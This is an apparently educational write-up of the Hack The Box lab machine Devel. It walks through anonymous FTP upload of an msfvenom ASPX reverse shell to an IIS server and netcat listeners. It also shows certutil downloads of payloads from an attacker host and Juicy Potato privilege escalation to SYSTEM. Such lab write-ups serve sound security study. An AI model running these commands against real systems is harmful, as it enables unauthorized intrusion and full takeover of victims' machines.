Hack The Box - Devel (Without Metasploit)
Configuration
The operating system that I will be using to tackle this machine is a Kali Linux VM.
What I learnt from other writeups is that it was a good habit to map a domain name to the machine’s IP address so as that it will be easier to remember. This can done by appending a line to /etc/hosts.
1
$ echo "10.10.10.5 devel.htb" | sudo tee -a /etc/hosts
Reconnaissance
To speed up my recon, I’ve moved to rustscan. I’ve also created 2 “aliases” called superscan and resolve.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
$ which resolve
resolve () {
cat /etc/hosts | grep --color=auto "$1" | cut -d " " -f 1
}
$ which superscan
superscan () {
name="$(resolve $1)"
rustscan --accessible -a "$name" -r 1-65535 -- -sT -sV -sC -Pn
}
$ superscan devel.htb
File limit higher than batch size. Can increase speed by increasing batch size '-b 1048476'.
Open 10.10.10.5:21
Open 10.10.10.5:80
Starting Script(s)
Script to be run Some("nmap -vvv -p ")
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-12 07:57 UTC
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:57
Completed NSE at 07:57, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:57
Completed NSE at 07:57, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:57
Completed NSE at 07:57, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 07:57
Completed Parallel DNS resolution of 1 host. at 07:57, 0.47s elapsed
DNS resolution of 1 IPs took 0.47s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 07:57
Scanning 10.10.10.5 [2 ports]
Discovered open port 21/tcp on 10.10.10.5
Discovered open port 80/tcp on 10.10.10.5
Completed Connect Scan at 07:57, 0.01s elapsed (2 total ports)
Initiating Service scan at 07:57
Scanning 2 services on 10.10.10.5
Completed Service scan at 07:57, 6.17s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.5.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:57
NSE: [ftp-bounce 10.10.10.5:21] PORT response: 501 Server cannot accept argument.
Completed NSE at 07:57, 0.93s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:57
Completed NSE at 07:57, 0.07s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:57
Completed NSE at 07:57, 0.00s elapsed
Nmap scan report for 10.10.10.5
Host is up, received user-set (0.0050s latency).
Scanned at 2021-01-12 07:57:14 UTC for 7s
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 01:06AM <DIR> aspnet_client
| 03-17-17 04:37PM 689 iisstart.htm
|_03-17-17 04:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http syn-ack Microsoft IIS httpd 7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:57
Completed NSE at 07:57, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:57
Completed NSE at 07:57, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:57
Completed NSE at 07:57, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.07 seconds
Enumeration (1)
Port 21 Microsoft ftpd
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ ftp devel.htb
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel.htb:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
After connecting to the FTP service, the contents seem like they belonged to a web server, or an IIS server specfically!
Port 80 Microsoft IIS httpd 7.5
A probable guess would be that the content of this IIS service is being shared via FTP, so lets try uploading a file to see whether it is indeed true.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ echo "IT WORKS" > test.txt
$ ftp devel.htb
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel.htb:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
10 bytes sent in 0.00 secs (256.9901 kB/s)
$ curl http://devel.htb/test.txt
IT WORKS
Exploitation (1)
Since we now know we can upload files to the IIS service via FTP, we can upload a .aspx file that will establish a reverse shell connection back to us.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$ msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1337 -f aspx > shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2714 bytes
$ ftp devel.htb
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel.htb:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> bin
200 Type set to I.
ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2749 bytes sent in 0.00 secs (1.6730 MB/s)
Now we start a nc listener:
1
2
$ nc -lvnp 1337
listening on [any] 1337 ...
And trigger the shell.aspx.
1
$ curl http://devel.htb/shell.aspx
And on our listener, we got a connection.
1
2
3
4
5
6
7
8
$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.XX,XX] from (UNKNOWN) [10.10.10.5] 49162
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv> whoami
iis apppool\web
Enumeration (2)
If we check out the privileges that iis apppool\web has,
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
c:\windows\system32\inetsrv> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeShutdownPrivilege Shut down the system Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
we realise that he has the SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege rights. This means we can use Juicy Potato. Since this machine is 32-bit (you can check from systeminfo), we need a 32-bit version of Juicy Potato from here.
We will need to also use msfvenom to generate a 32-bit reverse shell executable.
1
2
3
4
5
6
$ msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1337 -f exe > reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Exploitation (2)
After transferring both the Juicy Potato executable and our reverse shell executable from our attacker machine via HTTP,
1
2
3
4
5
6
7
8
9
10
11
12
c:\windows\system32\inetsrv> mkdir C:\temp
c:\windows\system32\inetsrv> certutil -f -split -urlcache http://10.10.XX.XX/reverse.exe C:\temp\reverse.exe
**** Online ****
000000 ...
01204a
CertUtil: -URLCache command completed successfully.
c:\windows\system32\inetsrv> certutil -f -split -urlcache http://10.10.XX.XX/juicypotato86.exe C:\temp\juicypotato86.exe
**** Online ****
000000 ...
040600
CertUtil: -URLCache command completed successfully.
we can start our nc listener and run Juicy Potato.
1
2
$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
1
2
3
4
5
6
7
C:\temp> juicypotato86.exe -l 1337 -p reverse.exe -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020}
Testing {03ca98d6-ff5d-49b8-abc6-03dd84127020} 1337
......
[+] authresult 0
{03ca98d6-ff5d-49b8-abc6-03dd84127020};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
On our listener, we get a connection as SYSTEM!
1
2
3
4
5
6
7
8
$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.XX.XX] from (UNKNOWN) [10.10.10.5] 49173
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
user.txt
The user flag is located in the desktop of babis.
1
2
C:\Users\babis\Desktop> type user.txt.txt
9ecdXXXXXXXXXXXXXXXXXXXXXXXXXXXX
root.txt
The root flag is in `Administrator’’s desktop, as always.
1
2
C:\Users\Administrator\Desktop>type root.txt.txt
e621XXXXXXXXXXXXXXXXXXXXXXXXXXXX
Rooted ! Thank you for reading and look forward for more writeups and articles !
This post is licensed under CC BY 4.0 by the author.